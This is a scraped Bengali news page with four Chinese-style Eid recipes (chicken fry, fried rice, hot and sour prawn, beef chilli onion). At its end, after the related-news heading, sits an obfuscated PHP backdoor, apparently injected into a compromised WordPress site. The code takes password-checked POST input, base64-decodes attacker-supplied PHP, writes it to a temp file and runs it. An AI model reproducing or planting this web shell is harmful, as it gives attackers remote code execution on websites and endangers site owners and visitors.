সোমবার, ১৭ই জুন, ২০২৪ খ্রিস্টাব্দ ৩রা আষাঢ়, ১৪৩১ বঙ্গাব্দ

ঈদের দিনে সুস্বাদু চাইনিজের ৪ পদ

news-image

সবসময় দেশি খাবার খেতে মন চায় না। ঈদের দিনের দিন অনেকেই ভিন্ন রকম খাবার বানাতে চাই। স্বাদের বৈচিত্র্য আনতে ঘরে বসেই তৈরি করতে পারেন চাইনিজ খাবার। তাই ভিন্ন স্বাদের ৪টি চাইনিজ রেসিপি নিয়ে এই আয়োজন।চিকেন ফ্রঠন : উপকরণ:মুরগি ১টি (৮ পিস),আদা বাটা ২ চা চামচ,কাঁচামরিচ বাটা আধা চা চামচ,গোলমরিচ গুঁড়া আধা চা চামচ,সয়াসস ২ টেবিল চামচ,টেস্টিং সল্ট ১ চা চামচ,চিনি আধা চামচ,লবণ পরিমাণমতো,লেবুর রস আধা চা চামচ,ভাজার জন্য তেল পরিমাণমতো,ডিম ২টা,কর্নফ্লাওয়ার ৩ টেবিল চামচ,টেম্পুরা পাউডার পরিমাণমতো।

প্রণালি:মুরগির টুকরা ভালো করে ধুয়ে কাঁটা চামচ দিয়ে কেঁচে নিন। এবার তেল, ডিম, কর্নফ্লাওয়ার ও টেম্পুরা পাউডার বাদে বাকি সব উপকরণ দিয়ে মুরগি মেখে ২/৩ ঘণ্টা মেরিনেট করুন। এবার ডিমে সামান্য লবণ, মরিচ গুঁড়া ও কর্নফ্লাওয়ার দিয়ে ফেটে নিন। মেরিনেট করা মুরগি ডিমে ডুবিয়ে টেম্পুরা পাউডারে গড়িয়ে ফ্রিজে কিছুক্ষণ রেখে ডুবো তেলে মাঝারি আঁচে সোনালি করে ভেজে নিন।

সস দিয়ে পরিবেশন করুন।ফ্রাইড রাইস : উপকরণ:পোলাওয়ের চাল আধা কেজি,মুরগির বুকের মাংস ১ কাপ,চিংড়ি ১ কাপ (খোসাছাড়ানো),ডিম ৪টি,আদা-রসুন বাটা ২ চা চামচ,পেঁয়াজ মোটা কুচি ১ কাপ,পেঁয়াজ কলি আধা কাপ,মটরশুঁটি আধা কাপ,গাজর ১ কাপ (গ্রেট করা),চিনি পরিমাণমতো,টেস্টিং সল্ট ১ টেবিল চামচ,গোলমরিচ গুঁড়া ১ চা চামচ,লবণ পরিমাণমতো,বাটার ও তেল আধা কাপ,কাজু বাদাম পরিমাণমতো।

প্রণালি:ফুটন্ত পানিতে পোলাওয়ের চাল দিয়ে কিছুক্ষণ রেখে মাড় ঝরিয়ে নিন। ভাত ঝরঝরা হতে হবে। এবার প্যানে বাটার ও তেল দিয়ে পেঁয়াজ কুচির অর্ধেক দিন। এবার মুরগি ও চিংড়ি, আদা-রসুন বাটা দিন। এরপর সয়াসস ও গোল মরিচ গুঁড়া দিয়ে ভাপ দেওয়া সবজি ঢেলে দিন। কাঁচা মরিচ কুচি দিন। এবার রান্না করা ভাত দিয়ে নেড়ে পেঁয়াজ কলি, ডিমের কুচি (ভেজে রাখা), টেস্টিং সল্ট, চিনি ও কাজু বাদাম দিয়ে ভালো করে নেড়েচেড়ে ২-৩ মিনিট পর সার্ভিং ডিশে ঢেলে গরম গরম পরিবেশন করুন।

হট অ্যান্ড সাওয়ার প্রন : উপকরণ:চিংড়ি ১ কাপ,রসুন কুচি ১ চা চামচ,লাল মরিচ গুঁড়া আধা চা চামচ,গোলমরিচ গুঁড়া আধা চা চামচ,টমেটো সস ৪ টেবিল চামচ,চিলি সস ১ টেবিল চামচ,লেবুর রস ১ টেবিল চামচ,ভিনেগার ২ চা চামচ,সয়াসস ২ চা চামচ,চিনি ১ চা চামচ,কর্নফ্লাওয়ার পরিমাণমতো,লবণ পরিমাণমতো,তেল ২ টেবিল চামচ,বাটার ২ টেবিল চামচ,টেস্টিং সল্ট আধা চা চমচ,পেঁয়াজ কলি ১ মুঠো।প্রণালি:চিংড়ির লেজ রেখে মাথা ও খোসা ফেলে দিন। এবার ধুয়ে সামান্য লবণ ও লেবুর রস দিয়ে মাখিয়ে রাখুন। প্যানে তেল ও বাটার দিয়ে রসুন কুচি দিন। তাতে চিংড়ি দিয়ে নেড়েচেড়ে টেস্টিং সল্ট, পেঁয়াজ কলি ও কর্নফ্লাওয়ার বাদে সব উপকরণ দিন। এবার কর্নফ্লাওয়ার চিকেন স্টকে গুলে ঢেলে দিন। তারপর টেস্টিং সল্ট, পেঁয়াজ কলি দিন। ফুটে উঠলে নামিয়ে ফেলুন। বেশি ঘন যেন না হয়। এবার পরিবেশন ডিশে ঢেলে ফ্রাইড রাইসের সঙ্গে পরিবেশন করুন।

বিফ-চিলি-অনিয়ন : উপকরণ:গরুর মাংস স্ট্রিপ করে কাটা ১ কাপ,আদা-রসুন বাটা ১ চা চামচ,ভিনেগার ১ টেবিল চামচ,সয়াসস ২ চা চামচ,গোলমরিচ গুঁড়া আধা চা চামচ,চিনি ১ চা চামচ,লবণ রিমাণমতো,টেস্টিং সল্ট ১ চা চামচ,বাটার ৪ টেবিল চামচ,ভাঁজখোলা পেঁয়াজ ১ কাপ,কাঁচা মরিচ ফালি ৫-৬টি,কর্নফ্লাওয়ার পরিমাণমতো।প্রণালি:প্যানে বাটার দিন, গরম হলে আদা-রসুন দিয়ে নেড়ে সামান্য পানি দিয়ে মসলা কষান। এবার ভিনেগার, সয়াসস দিয়ে মেখে রাখা মাংস ঢেলে দিন। চিনি, গোলমরিচ গুঁড়া ও লবণ দিয়ে সেদ্ধ হওয়া পর্যন্ত অপেক্ষা করুন। প্রয়োজন হলে সামান্য গরম পানি দিন। এবার ভাঁজখোলা পেঁয়াজ দিন। ২ মিনিট নেড়ে কর্নফ্লাওয়ার গুলে দিন। তারপর টেস্টিং সল্ট, কাঁচা মরিচ (বিচি ছাড়ানো) দিন। হয়ে গেলে নামিয়ে পরিবেশন পাত্রে ঢেলে নিন।

এ জাতীয় আরও খবর

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}